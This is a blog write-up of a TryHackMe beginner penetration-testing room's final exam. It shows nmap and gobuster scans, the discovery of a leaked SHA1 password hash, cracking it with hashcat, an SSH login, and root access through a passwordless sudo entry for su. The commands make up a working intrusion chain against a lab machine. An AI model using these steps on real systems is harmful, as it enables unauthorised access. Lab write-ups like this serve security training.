8 December 2020 / TRYHACKME, CTF, EASY CC: Pentesting Write Up Overview CC:Pen Testing is a guided room on TryHackMe providing an introduction to some of the common penetration testing tools. Its really well layed out and I recommend to anyone starting out in penetration testing or CTF challenges. This write up will only cover the steps for the final exam. Nmap As normal, I kicked off a nmap scan to see what ports are available. └──╼ $sudo nmap -sC -sV -oA initial 10.10.215.190 [sudo] password for daz: Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-08 21:42 GMT Nmap scan report for 10.10.215.190 Host is up (0.027s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA) | 256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA) |_ 256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 2 Ports open: 22 - SSH - Banner is showing its an Ubuntu machine 80 - HTTP - Apache web server version 2.4.18 I also ran a full port scan but no additional ports were found. Enumeration The web page displays the basic apache page, I checked the source code but everything was standard. I kicked off a gobuster to see what other directories were available. └──╼ $gobuster dir -u http://10.10.215.190 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.215.190 [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/12/08 21:49:12 Starting gobuster =============================================================== /secret (Status: 301) /server-status (Status: 403) =============================================================== 2020/12/08 21:51:09 Finished =============================================================== One directory found ‘/secret’, going to secret doesn’t display anything. I ran a second gobuster but this time in the secret folder and checked for .log, .txt and .html using the -x flag. └──╼ $gobuster dir -u http://10.10.215.190/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x log,txt,html =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.215.190/secret [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: log,txt,html [+] Timeout: 10s =============================================================== 2020/12/08 21:55:16 Starting gobuster =============================================================== /index.html (Status: 200) /secret.txt (Status: 200) Progress: 49450 / 220561 (22.42%)^C [!] Keyboard interrupt detected, terminating. =============================================================== 2020/12/08 21:59:31 Finished =============================================================== Initial Access 1 additional file found, secret.txt. Web browsing to http://10.10.215.190/secret/secret.txt I could see the contents of the file: nyan:046385855FC9580393853D8E(REDACTED) The password looks to be SHA1. I put the hash in to a file called hash.txt on my VM and ran hashcat with the command: hashcat -m 100 hash.txt /usr/share/wordlists/rockyou.txt –force Hashcat was successfully able to crack the hash and I was able to SSH in to the machine. Priv Esc Once connected via SSH I ran ‘sudo -l’, the user nyan is able to run the command /bin/su as root without providing a password. This provides a simple privesc by using the command: ‘sudo su’ Other techniques like this can be found on gtfobins. nyan@ubuntu:~$ sudo -l Matching Defaults entries for nyan on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nyan may run the following commands on ubuntu: (root) NOPASSWD: /bin/su nyan@ubuntu:~$ nyan@ubuntu:~$ sudo su root@ubuntu:/home/nyan# id uid=0(root) gid=0(root) groups=0(root) root@ubuntu:/home/nyan# Thanks for reading!